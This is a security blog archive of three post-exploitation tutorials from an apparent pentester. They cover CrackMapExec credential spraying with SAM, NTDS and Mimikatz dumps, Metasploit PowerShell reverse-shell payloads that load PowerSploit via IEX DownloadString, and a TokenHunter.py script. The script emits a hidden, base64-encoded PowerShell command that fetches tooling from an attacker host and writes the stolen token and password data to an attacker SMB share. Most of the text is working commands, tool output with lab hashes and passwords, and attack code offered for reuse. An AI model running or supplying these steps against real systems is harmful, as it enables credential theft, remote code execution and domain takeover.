Archive for category Post Exploitation
WMI Post Exploitation
Posted by Spoonman1091 in Post Exploitation, Security on March 10, 2016
I’ve recently stumbled upon a script that has become my favorite post-exploitation tool. It’s multi-threaded, contains no local binaries, and no dropper binaries. It provides a plethora of functionality to escalate privileges on the network, all through WMI calls. The tool is CrackMapExec, written by byt3bl33d3r.
Imagine that we’ve compromised credentials on an internal assessment. CrackMapExec can easily be utilized to find where those credentials have elevated privileges. This command executes 100 threads attempting to login to all systems on the 192.168.81.0/24 range:
[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p Password123 -d workgroup -t 100 192.168.81.0/24 03-08-2016 12:34:29 SMB 192.168.81.10:445 PWNT-DC [*] Windows 6.1 Build 7601 (name:PWNT-DC) (domain:workgroup) 03-08-2016 12:34:29 SMB 192.168.81.10:445 PWNT-DC [-] workgroup\TrustedSec:Password123 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.) 03-08-2016 12:34:35 SMB 192.168.81.216:445 WIN7-SPOONMAN [*] Windows 6.1 Build 7601 (name:WIN7-SPOONMAN) (domain:workgroup) 03-08-2016 12:34:35 SMB 192.168.81.219:445 WIN8-SPOONMAN [*] Windows 10.0 Build 10586 (name:WIN8-SPOONMAN) (domain:workgroup) 03-08-2016 12:34:35 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Login successful workgroup\TrustedSec:Password123 03-08-2016 12:34:35 SMB 192.168.81.219:445 WIN8-SPOONMAN [-] workgroup\TrustedSec:Password123 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
Finding administrative access on one system, we can then run a hashdump, which may be able to be utilized in a pass-the-hash attack to other systems on the network:
[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p Password123 -d workgroup 192.168.81.216 --sam 03-08-2016 12:39:54 SMB 192.168.81.216:445 WIN7-SPOONMAN [*] Windows 6.1 Build 7601 (name:WIN7-SPOONMAN) (domain:workgroup) 03-08-2016 12:39:54 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Login successful workgroup\TrustedSec:Password123 03-08-2016 12:39:55 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Dumping SAM hashes (uid:rid:lmhash:nthash) 03-08-2016 12:39:55 SMB 192.168.81.216:445 WIN7-SPOONMAN Administrator:500:aad3b435b51404eeaad3b435b51404ee:bc23a1506bd3c8d3a533680c516bab27::: 03-08-2016 12:39:55 SMB 192.168.81.216:445 WIN7-SPOONMAN Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN TrustedSec:1001:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71::: 03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN ASPNET:1005:aad3b435b51404eeaad3b435b51404ee:e8dfb6d1552e2fc23a66e8d573abbdba::: 03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN HomeGroupUser$:1007:aad3b435b51404eeaad3b435b51404ee:46e6eeed8d95245e068dfbec8a81ef40::: 03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN TrustedUser:1012:aad3b435b51404eeaad3b435b51404ee:dea92d9004d55c23189754069eeec7fc:::
We can also scrape clear text credentials from memory:
[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p Password123 -d workgroup 192.168.81.216 --mimikatz 03-08-2016 12:40:54 SMB 192.168.81.216:445 WIN7-SPOONMAN [*] Windows 6.1 Build 7601 (name:WIN7-SPOONMAN) (domain:workgroup) 03-08-2016 12:40:55 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Login successful workgroup\TrustedSec:Password123 03-08-2016 12:40:56 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Executed command via WMIEXEC 03-08-2016 12:40:59 192.168.81.216 - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - 03-08-2016 12:41:04 192.168.81.216 - - "POST / HTTP/1.1" 200 - 03-08-2016 12:41:04 PARSER 192.168.81.216:1138 [+] Found plain text credentials (domain\user:password) 03-08-2016 12:41:04 PARSER 192.168.81.216:1138 PWNT\TrustedSec:GoatBah1! 03-08-2016 12:41:04 PARSER 192.168.81.216:1138 PWNT\WIN7-SPOONMAN$:%Xa4Qt*Qbq\I3N-DdW?@btkdv1-]JK<AQ@I;k`K4e, 2"Q,(%NZy@hfQy^q"q;<L+ubiD7"np;=T#c<\]\]criYyy[(nE y6(Ra;as[Z-Sti-pbm; 03-08-2016 12:41:04 PARSER 192.168.81.216:1138 PWNT\WIN7-SPOONMAN$:%Xa4Qt*Qbq\I3N-DdW?@btkdv1-]JK<AQ@I;k`K4e, 2"Q,(%NZy@hfQy^q"q;<L+ubiD7"np;=T#c<\]\]criYyy[(nE y6(Ra;as[Z-Sti-pbm; 03-08-2016 12:41:04 PARSER 192.168.81.216:1138 [*] Saved Mimikatz's output to Mimikatz-192.168.81.216-2016-03-08_124104.log
Notice that all results are logged to the ./logs directory. We have a member of the “Domain Admins” group from Mimikatz, so lets retrieve hashes safely from NTDS.dit on the domain controller:
[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p GoatBah1! -d pwnt.com 192.168.81.10 --ntds drsuapi 03-08-2016 12:43:45 SMB 192.168.81.10:445 PWNT-DC [*] Windows 6.1 Build 7601 (name:PWNT-DC) (domain:pwnt.com) 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC [+] Login successful pwnt.com\TrustedSec:GoatBah1! 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC [+] Dumping NTDS.dit secrets using the DRSUAPI method (domain\uid:rid:lmhash:nthash) 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:918d38906649503fde8a641dbd87d857::: 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:903cd15bd70bbd6f4517ad01eeccbe15::: 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC TrustedSec:1000:aad3b435b51404eeaad3b435b51404ee:918d38906649503fde8a641dbd87d857::: 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC pwnt.com\testuser:1104:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71::: 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC PWNT-DC$:1001:aad3b435b51404eeaad3b435b51404ee:07a60a315af67d202aa52e846ee4fb27::: 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC TEST$:1105:aad3b435b51404eeaad3b435b51404ee:4ab69c349bfaa599b46069f3d57dbe49::: 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC TEST2$:1106:aad3b435b51404eeaad3b435b51404ee:3ce8a48ae2264366c6c0ce9b6155bab6::: 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC WIN7-SPOONMAN$:1109:aad3b435b51404eeaad3b435b51404ee:63c459c139c5bdeb4c404327261d75f1:::
These are just a couple of examples, but there is so much more functionality packed into this script. So check it out! Thanks byt3bl33d3r!
Interactive PowerShell Sessions Within Meterpreter
Posted by Spoonman1091 in Post Exploitation, Security on June 26, 2015
In case anyone missed it, Metasploit has a couple of new payloads that allow interactive PowerShell sessions. What does that mean? Previously, if you tried to open a PowerShell session within Meterpreter, there was no interaction between PowerShell and your session.
Example:
msf exploit(psexec_psh) > exploit [*] Started HTTPS reverse handler on https://0.0.0.0:444/ [*] 192.168.81.10:445 - Executing the payload... [+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable... [*] 192.168.81.10:49309 (UUID: 820e464723e817f9/x86=1/windows=1/2015-06-08T16:12:05Z) Staging Native payload ... [*] Meterpreter session 23 opened (192.168.81.217:444 -> 192.168.81.10:49309) at 2015-06-08 12:12:05 -0400 meterpreter > shell Process 2776 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>powershell powershell Windows PowerShell Copyright (C) 2009 Microsoft Corporation. All rights reserved. Get-ExecutionPolicy
Any command that you type seems to disappear in the ether. Now, thanks to the hard work of
Ben Turner (@benpturner) and Dave Hardy (@davehardy20) at Nettitude, we have full interaction with PowerShell sessions! Their introduction to these modules is here.
To find the new payloads within Metasploit, simply search for “Interactive_Powershell”
msf payload(reverse_powershell) > search Interactive_Powershell Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- payload/cmd/windows/powershell_bind_tcp normal Windows Interactive Powershell Session, Bind TCP payload/cmd/windows/powershell_reverse_tcp normal Windows Interactive Powershell Session, Reverse TCP payload/windows/powershell_bind_tcp normal Windows Interactive Powershell Session, Bind TCP payload/windows/powershell_reverse_tcp normal Windows Interactive Powershell Session, Reverse TCP
Let’s try a “Reverse TCP” payload:
msf exploit(psexec_psh) > set payload windows/powershell_reverse_tcp payload => windows/powershell_reverse_tcp msf exploit(psexec_psh) > exploit [*] Started reverse handler on 192.168.81.217:444 [*] 192.168.81.10:445 - Executing the payload... [+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable... [*] Powershell session session 24 opened (192.168.81.217:444 -> 192.168.81.10:49317) at 2015-06-08 12:15:42 -0400 Windows PowerShell running as user PWNT-DC$ on PWNT-DC Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Windows\system32>Get-ExecutionPolicy Bypass
This allows us to use all of our favorite PowerShell tools, such as PowerSploit and PowerTools (included in Veil-Framework), from within a Meterpreter session. To avoid downloading the tools to disk, we use “Invoke-Expression” to run the tools directly in memory. I like to host them locally, as opposed to downloading the from the Internet.
PS C:\Windows\system32>IEX(New-Object Net.WebClient).DownloadString("http://192.168.81.217/PowerTools/PowerView/powerview.ps1") PS C:\Windows\system32> Get-NetGroup "Domain Admins" |select UserName UserName -------- TrustedSec Administrator
Instead of loading modules from within an existing session, the payloads also allow you to configure modules before the session is created, by setting the “LOAD_MODULES” parameter.
Payload options (windows/powershell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none) LHOST 192.168.81.217 yes The listen address LOAD_MODULES http://192.168.81.217/PowerTools/PowerView/powerview.ps1 no A list of powershell modules seperated by a comma to download over the web LPORT 444 yes The listen port msf exploit(psexec_psh) > exploit [*] Loading 1 modules into the interactive PowerShell session [*] Started reverse handler on 192.168.81.217:444 [*] 192.168.81.10:445 - Executing the payload... [+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable... [*] Powershell session session 26 opened (192.168.81.217:444 -> 192.168.81.10:49391) at 2015-06-08 12:29:58 -0400 Windows PowerShell running as user PWNT-DC$ on PWNT-DC Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Windows\system32> Get-NetForest Name : pwnt.com Sites : {Default-First-Site-Name} Domains : {pwnt.com} GlobalCatalogs : {pwnt-dc.pwnt.com} ApplicationPartitions : {DC=DomainDnsZones,DC=pwnt,DC=com, DC=ForestDnsZones,DC =pwnt,DC=com} ForestMode : Windows2008R2Forest RootDomain : pwnt.com Schema : CN=Schema,CN=Configuration,DC=pwnt,DC=com SchemaRoleOwner : pwnt-dc.pwnt.com NamingRoleOwner : pwnt-dc.pwnt.com
You can also load multiple modules all at once by providing a list separated by commas. I cloned the PowerSploit and PowerTools modules to my Apache root, so to enumerate all modules, I simply use “find” to display all PowerShell scripts recursively.
root@kali:~# find /var/www -name "*.ps1" /var/www/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1 /var/www/PowerSploit/CodeExecution/Invoke-DllInjection.ps1 /var/www/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1 /var/www/PowerSploit/CodeExecution/Invoke--Shellcode.ps1 /var/www/PowerSploit/CodeExecution/Invoke-Shellcode.ps1 /var/www/PowerSploit/Recon/Invoke-Portscan.ps1 /var/www/PowerSploit/Recon/Get-ComputerDetails.ps1 /var/www/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1 /var/www/PowerSploit/Recon/Get-HttpStatus.ps1 /var/www/PowerSploit/AntivirusBypass/Find-AVSignature.ps1 /var/www/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1 /var/www/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1 /var/www/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1 /var/www/PowerSploit/Exfiltration/Out-Minidump.ps1 /var/www/PowerSploit/Exfiltration/Get-GPPPassword.ps1 /var/www/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1 /var/www/PowerSploit/Exfiltration/Get-VaultCredential.ps1 /var/www/PowerSploit/Exfiltration/Get-Keystrokes.ps1 /var/www/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1 /var/www/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1 /var/www/PowerSploit/ScriptModification/Remove-Comments.ps1 /var/www/PowerSploit/ScriptModification/Out-EncodedCommand.ps1 /var/www/PowerSploit/ScriptModification/Out-CompressedDll.ps1 /var/www/PowerSploit/ScriptModification/Out-EncryptedScript.ps1 /var/www/PowerTools/PowerBreach/PowerBreach.ps1 /var/www/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1 /var/www/PowerTools/PewPewPew/Invoke-MassTemplate.ps1 /var/www/PowerTools/PewPewPew/Invoke-MassSearch.ps1 /var/www/PowerTools/PewPewPew/Invoke-MassCommand.ps1 /var/www/PowerTools/PewPewPew/Invoke-MassTokens.ps1 /var/www/PowerTools/PowerPick/PSInjector/DLLEnc.ps1 /var/www/PowerTools/PowerPick/PSInjector/PSInject.ps1 /var/www/PowerTools/PowerUp/PowerUp.ps1 /var/www/PowerTools/PowerView/functions/Invoke-UserHunter.ps1 /var/www/PowerTools/PowerView/functions/Get-NetShare.ps1 /var/www/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1 /var/www/PowerTools/PowerView/functions/Invoke-Netview.ps1 /var/www/PowerTools/PowerView/functions/Get-Net.ps1 /var/www/PowerTools/PowerView/functions/Get-NetSessions.ps1 /var/www/PowerTools/PowerView/functions/Get-NetLoggedon.ps1 /var/www/PowerTools/PowerView/powerview.ps1
To replace “/var/www” with your web host, use “sed”:
root@kali:~# find /var/www -name "*.ps1" |sed 's_/var/www_http://192.168.81.217_' http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1 http://192.168.81.217/PowerSploit/CodeExecution/Invoke-DllInjection.ps1 http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1 http://192.168.81.217/PowerSploit/CodeExecution/Invoke--Shellcode.ps1 http://192.168.81.217/PowerSploit/CodeExecution/Invoke-Shellcode.ps1 http://192.168.81.217/PowerSploit/Recon/Invoke-Portscan.ps1 http://192.168.81.217/PowerSploit/Recon/Get-ComputerDetails.ps1 http://192.168.81.217/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1 http://192.168.81.217/PowerSploit/Recon/Get-HttpStatus.ps1 http://192.168.81.217/PowerSploit/AntivirusBypass/Find-AVSignature.ps1 http://192.168.81.217/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1 http://192.168.81.217/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1 http://192.168.81.217/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1 http://192.168.81.217/PowerSploit/Exfiltration/Out-Minidump.ps1 http://192.168.81.217/PowerSploit/Exfiltration/Get-GPPPassword.ps1 http://192.168.81.217/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1 http://192.168.81.217/PowerSploit/Exfiltration/Get-VaultCredential.ps1 http://192.168.81.217/PowerSploit/Exfiltration/Get-Keystrokes.ps1 http://192.168.81.217/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1 http://192.168.81.217/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1 http://192.168.81.217/PowerSploit/ScriptModification/Remove-Comments.ps1 http://192.168.81.217/PowerSploit/ScriptModification/Out-EncodedCommand.ps1 http://192.168.81.217/PowerSploit/ScriptModification/Out-CompressedDll.ps1 http://192.168.81.217/PowerSploit/ScriptModification/Out-EncryptedScript.ps1 http://192.168.81.217/PowerTools/PowerBreach/PowerBreach.ps1 http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1 http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTemplate.ps1 http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassSearch.ps1 http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassCommand.ps1 http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTokens.ps1 http://192.168.81.217/PowerTools/PowerPick/PSInjector/DLLEnc.ps1 http://192.168.81.217/PowerTools/PowerPick/PSInjector/PSInject.ps1 http://192.168.81.217/PowerTools/PowerUp/PowerUp.ps1 http://192.168.81.217/PowerTools/PowerView/functions/Invoke-UserHunter.ps1 http://192.168.81.217/PowerTools/PowerView/functions/Get-NetShare.ps1 http://192.168.81.217/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1 http://192.168.81.217/PowerTools/PowerView/functions/Invoke-Netview.ps1 http://192.168.81.217/PowerTools/PowerView/functions/Get-Net.ps1 http://192.168.81.217/PowerTools/PowerView/functions/Get-NetSessions.ps1 http://192.168.81.217/PowerTools/PowerView/functions/Get-NetLoggedon.ps1 http://192.168.81.217/PowerTools/PowerView/powerview.ps1
To create a comma separated list, use “tr”:
root@kali:~# find /var/www -name "*.ps1" |sed 's_/var/www_http://192.168.81.217_'|sed 's_/var/www_https://192.168.81.217_' |tr '\n' ',' http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-DllInjection.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke--Shellcode.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-Shellcode.ps1,http://192.168.81.217/PowerSploit/Recon/Invoke-Portscan.ps1,http://192.168.81.217/PowerSploit/Recon/Get-ComputerDetails.ps1,http://192.168.81.217/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1,http://192.168.81.217/PowerSploit/Recon/Get-HttpStatus.ps1,http://192.168.81.217/PowerSploit/AntivirusBypass/Find-AVSignature.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Out-Minidump.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-GPPPassword.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-VaultCredential.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-Keystrokes.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1,http://192.168.81.217/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Remove-Comments.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-EncodedCommand.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-CompressedDll.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-EncryptedScript.ps1,http://192.168.81.217/PowerTools/PowerBreach/PowerBreach.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTemplate.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassSearch.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassCommand.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTokens.ps1,http://192.168.81.217/PowerTools/PowerPick/PSInjector/DLLEnc.ps1,http://192.168.81.217/PowerTools/PowerPick/PSInjector/PSInject.ps1,http://192.168.81.217/PowerTools/PowerUp/PowerUp.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-UserHunter.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetShare.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-Netview.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-Net.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetSessions.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetLoggedon.ps1,http://192.168.81.217/PowerTools/PowerView/powerview.ps1,
Copy/paste that output into your “LOAD_MODULES” parameter and all the PowerShell goodness is at your fingertips. Go forth and plunder!!!
Account Hunting for Invoke-TokenManipulation
Posted by Spoonman1091 in Post Exploitation, Security on January 30, 2015
I’ve been searching quite a while now for the best way to search for domain admin tokens, once admin rights are attained on a large number of systems during a pentest. Normally, I run “psexec_loggedin_users” within Metasploit, spool the output to a file, then egrep it for users in the “Domain Admins” group. This often works, but can easily miss systems that have a domain admin kerberos security token still loaded in memory. There are a couple of “Token_Hunter” post modules, but you need to have a shell on the systems to run them, which can take a long time to establish, load incognito, and list tokens. As much as I love shellz, I certainly don’t care to have a couple thousand of them connecting back to my machine. So, I think I’ve finally pieced together a viable method from a couple of articles posted around the Internet.
The first article is from Chris Campbell posted on PentestGeek. It shows us how to download and execute a PowerSploit module using PowerShell, all in memory. A couple of posts have described utilizing this method with Invoke-Mimikatz.ps1, so why not Invoke-TokenManipulation.ps1? For reference: Carnal0wnage, HarmJoy
To setup the environment, I first downloaded PowerSploit to my apache directory:
cd /var/www/ git clone https://github.com/mattifestation/PowerSploit.git
Then configured Samba with an open share to capture the output files:
nano /etc/samba/smb.conf [loot$] comment = Loot path = /root/loot browseable = yes read only = no guest ok = yes public = yes
Then create the folder and grant full permissions. I created a folder named “tokens” under “loot”.
Then, I stole the “PowerShell encoding” section from David Kennedy’s “unicorn” script to encode the following string:
IEX (New-Object Net.WebClient).DownloadString(“http://<attacker_ip>/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1");Invoke-TokenManipulation -Enumerate |Out-File -Encoding "UTF8" -FilePath \\<attacker_ip>\loot$\tokens\$env:computername.txt
This will download “Invoke-TokenManipulation.ps1” from my web host, execute it within memory to enumerate tokens, and pipe the output to my SMB share into a file named as the computer.
Now, I just use the “psexec_command” module within Metasploit to execute my encoded string on all systems and rain down tokens into my share.
msf auxiliary(psexec_command) > info Name: Microsoft Windows Authenticated Administration Utility Module: auxiliary/admin/smb/psexec_command License: Metasploit Framework License (BSD) Rank: Normal Provided by: Royce Davis @R3dy__ <rdavis@accuvant.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- COMMAND yes The command you want to execute on the remote host RHOSTS 192.168.81.10 yes The target address range or CIDR identifier RPORT 445 yes The Target port SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SMBDomain pwnt.com no The Windows domain to use for authentication SMBPass GoatBah1! no The password for the specified username SMBSHARE C$ yes The name of a writeable share on the server SMBUser TrustedSec no The username to authenticate as THREADS 255 yes The number of concurrent threads WINPATH WINDOWS yes The name of the remote Windows directory Description: This module uses a valid administrator username and password to execute an arbitrary command on one or more hosts, using a similar technique than the "psexec" utility provided by SysInternals. Daisy chaining commands with '&' does not work and users shouldn't try it. This module is useful because it doesn't need to upload any binaries to the target machine. References: http://cvedetails.com/cve/1999-0504/ http://www.osvdb.org/3106 http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access http://sourceforge.net/projects/smbexec/ http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx msf auxiliary(psexec_command) > set command powershell -nop -win hidden -noni -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADgAMQAuADIAMQA5AC8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8ARQB4AGYAaQBsAHQAcgBhAHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACIAKQA7AEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwAgAHwATwB1AHQALQBGAGkAbABlACAALQBFAG4AYwBvAGQAaQBuAGcAIAAiAFUAVABGADgAIgAgAC0ARgBpAGwAZQBQAGEAdABoACAAXABcADEAOQAyAC4AMQA2ADgALgA4ADEALgAyADEAOQBcAGwAbwBvAHQAJABcAHAAYQBzAHMAdwBvAHIAZABzAFwAJABlAG4AdgA6AGMAbwBtAHAAdQB0AGUAcgBuAGEAbQBlAC4AdAB4AHQA command => powershell -nop -win hidden -noni -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADgAMQAuADIAMQA5AC8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8ARQB4AGYAaQBsAHQAcgBhAHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACIAKQA7AEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwAgAHwATwB1AHQALQBGAGkAbABlACAALQBFAG4AYwBvAGQAaQBuAGcAIAAiAFUAVABGADgAIgAgAC0ARgBpAGwAZQBQAGEAdABoACAAXABcADEAOQAyAC4AMQA2ADgALgA4ADEALgAyADEAOQBcAGwAbwBvAHQAJABcAHAAYQBzAHMAdwBvAHIAZABzAFwAJABlAG4AdgA6AGMAbwBtAHAAdQB0AGUAcgBuAGEAbQBlAC4AdAB4AHQA msf auxiliary(psexec_command) > run [*] 192.168.81.10:445 - Executing the command... [+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable... [*] checking if the file is unlocked [*] 192.168.81.10:445 - Unable to get handle: The server responded with error: STATUS_SHARING_VIOLATION (Command=45 WordCount=0) [-] Command seems to still be executing. Try increasing RETRY and DELAY [*] 192.168.81.10:445 - Getting the command output... [*] 192.168.81.10:445 - Command finished with no output [*] 192.168.81.10:445 - Executing cleanup... [-] 192.168.81.10:445 - Unable to cleanup \WINDOWS\Temp\GkdedgMwXOVyHble.txt. Error: The server responded with error: STATUS_SHARING_VIOLATION (Command=6 WordCount=0) [-] 192.168.81.10:445 - Unable to cleanup. Maybe you'll need to manually remove true, false from the target. [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Then, just egrep the files to enumerate any domain admins.
root@trustedsec4-lin:~/loot/tokens# egrep -i 'trustedsec|admin' * /dev/null PWNT-DC.txt:Username : TrustedSec
All that’s left is to pop a shell on that system, impersonate their token, and escalate privileges on the domain.
The “encoding” script was easily modified for Mimikatz as well (it writes to “loot$/passwords/”). To grep the file for a specific user’s password:
root@trustedsec4-lin:~/loot/passwords# grep -A 2 TrustedSec * /dev/null PWNT-DC.txt:User Name : TrustedSec PWNT-DC.txt-Domain : PWNT PWNT-DC.txt-SID : S-1-5-21-1458926743-1222556689-571800001-1000 -- PWNT-DC.txt: * Username : TrustedSec PWNT-DC.txt- * Domain : PWNT PWNT-DC.txt- * NTLM : 918d38906649503fde8a641dbd87d857 -- PWNT-DC.txt: * Username : TrustedSec PWNT-DC.txt- * Domain : PWNT PWNT-DC.txt- * Password : GoatBah1!
Full script source provided below. Happy Hunting!
TokenHunter.py
#!/usr/bin/env python # This download "Invoke-TokenManipulation.ps1" from the attacker's webhost, # then execute the script in memory and pipe its output ot the attacker's SMB share # "\\loot$\tokens\". # # Formulated mainly from the following articles/tools # https://www.pentestgeek.com/2013/09/18/invoke-shellcode/ # http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html # http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/ # https://github.com/trustedsec/unicorn # # Script Dependency # https://github.com/mattifestation/PowerSploit/tree/master/Exfiltration # # TrustedSec import base64 attacker_ip = "<put your IP here>" # Main guts def main(): powershell_code = "IEX (New-Object Net.WebClient).DownloadString(\"http://" + attacker_ip + "/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1\");Invoke-TokenManipulation -Enumerate |Out-File -Encoding \"UTF8\" -FilePath \\\\" + attacker_ip + "\\loot$\\tokens\\$env:computername.txt" full_attack = "powershell -nop -win hidden -noni -enc " + base64.b64encode(powershell_code.encode('utf_16_le')) print full_attack # Standard boilerplate to call the main() function if __name__ == '__main__': main()
PasswordHunter.py
